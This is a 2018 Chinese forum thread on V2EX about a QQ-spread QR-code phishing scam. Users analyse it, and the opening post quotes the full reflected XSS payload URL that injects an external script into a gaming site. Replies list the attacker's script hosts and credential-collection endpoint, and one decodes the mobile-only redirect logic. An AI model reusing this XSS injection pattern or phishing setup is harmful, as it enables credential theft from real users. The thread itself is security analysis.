V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member Sign In
工单节点使用指南
• 请用平和的语言准确描述你所遇到的问题
• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类,尊重是相互的
• 如果是关于 V2EX 本身的问题反馈,请使用 反馈 节点
This topic created in 2820 days ago, the information mentioned may be changed or developed.
朋友自动发给我的,说是前不久他朋友发给他的,通过 QQ 传播的,需要在手机 QQ 上扫码
二维码解析后的恶意链接
http://comment.ali213.net/ali-comment-renotice.php?callback=%00%00%00%00%00%00%00%3CscripT/src=//633832.pywbm.cn/template/app.js%3E%3C/scripT%3E%3C!--
其中指向的恶意代码
http://633832.pywbm.cn/template/app.js
鹅厂员工调查下为啥会自动发给好友?
有没有搞安全的大佬研究下?
Supplement 1 · Aug 9, 2018
游侠网没做防 XSS 注入
手机 QQ 内置浏览器没做 XSS 注入检测
手机 QQ 内置浏览器没做 XSS 注入检测
 |
1
yejinmo OP 恶意图片:
 |
 |
2
tangweihua163 Aug 8, 2018
屁大点事儿,又不是山( shan )洞( dong )佃( dian )妇( fu )
|
 |
3
xmdhs Aug 8, 2018 via iPad
大概是他没看域名就输了密码吧
 |
 |
4
kY8mbXW833Lu28xn Aug 8, 2018 via Android
这是人的漏洞,安全领域叫社会工程学,凯文叫它欺骗的艺术。so,你被骗了,叫警察的漏洞
|
 |
5
e1el Aug 8, 2018
这不叫漏洞,这叫
 ) |
 |
8
Lentin Aug 8, 2018  1
这个应该是属于 @游侠网 ali213.net 的一个 XSS 漏洞,跟腾讯关系不大
|
|
9
Lentin Aug 8, 2018 1
|
 |
10
34C Aug 9, 2018
我想说那个二维码做得蛮好看的…… 有谁知道在哪生成的吗……
|
 |
11
sdshdv Aug 9, 2018 via Android
这种老骗术也就刚刚用 QQ 的小学生会上当
|
 |
12
qiayue PRO 1
最后网页会把假的登录框得到的账号和密码传输到 http://qzone.duboy.com.cn/user.php
之后跳转到 http://yunzhijia.com/microblog/filesvr/5b365ddd364a0f55c8d16590,给你看狗 |
 |
13
AlisaDestiny Aug 9, 2018 1
被插入的 js 地址:
``` http://qqq.brhrc.cn/template/login.js ```  由于页面代码使用的 base64 编码和 arc4 加密,这是最终解码出来的页面代码: ``` https://paste.ubuntu.com/p/y98DWVZYMg/ ``` 这是账号提交的地址:  我能做的就是这么多了。各位如何对待这个服务器请随意。 |
 |
14
yamedie Aug 9, 2018 via Android 1
@34C 联图 liantu.com
|
 |
15
jiqing Aug 9, 2018
@AlisaDestiny #12 兄弟你这怎么解码出来的
|
 |
16
opengps Aug 9, 2018
这是个老骗术,就是仿站,钓鱼拿到账号密码,你随便输入点他都会记录
|
|
17
yejinmo OP |
 |
20
CokeMine Aug 9, 2018 via Android
虚假登录界面
同二维码 以前差点中过招,还好最后回过神来了 我的好友好几个都被盗给我发一模一样的 zz 二维码了 |
 |
21
crazygod Aug 9, 2018
钓鱼网站,最简单的破解方法就是看网址。。。官方一般不会有杂七杂八的前缀和后缀
|
 |
22
faceRollingKB Aug 9, 2018
人可以做得更多,看域名看证书
浏览器也可以做得更多,做一些常见的问题检测 |
 |
24
licoycn Aug 9, 2018
很明显钓鱼网站
|
 |
26
tutustream Aug 9, 2018 1
|
 |
27
C860 Aug 9, 2018 2
是游侠网的同学修复了?我现在看到的结果是:
fuck_your_mama({"status":"0","msg":"0"}) |
|
30
3C3Ju2wXX3tpBWEL Aug 9, 2018
@tetsai 的确挺讲究的。
|
 |
31
8qwe24657913 Aug 9, 2018
@AlisaDestiny #13 那个 pastebin 上代码第 47 行还是混淆过的,解码出来是
var system={win:false,mac:false,xll:false};var p=navigator.platform;system.win=p.indexOf("Win")==0;system.mac=p.indexOf("Mac")==0;system.x11=(p=="X11")||(p.indexOf("Linux")==0);if(system.win||system.mac||system.xll){window.location.href="http://pvp.qq.com/m/"} 如果系统是 win / mac / linux,跳到王者荣耀官网,摆明了是准备只坑手机…… 再就是点击登录后跳转的图片  这表情嘲讽意义很浓啊 |
 |
32
lneoi Aug 9, 2018
23333 这个返回
|
 |
33
TOTT Aug 9, 2018
楼主头像大图有没有,或者高清的
|
|
34
bpllzbh Aug 9, 2018
|
|
36
yejinmo OP |
 |
37
quickma Aug 9, 2018
腾讯曾经 5 块钱一个网站漏洞哈哈哈
|
 |
38
input2output Aug 9, 2018
类似这种 XSS 见过好几次了
|
 |
40
colouryin Aug 10, 2018
我也有同学给我发……手机 QQ 点链接要手动输密码,用浏览器打开能用快捷登录调用 QQ 登录,然后会跳转到 QQ 空间……
|
Select Language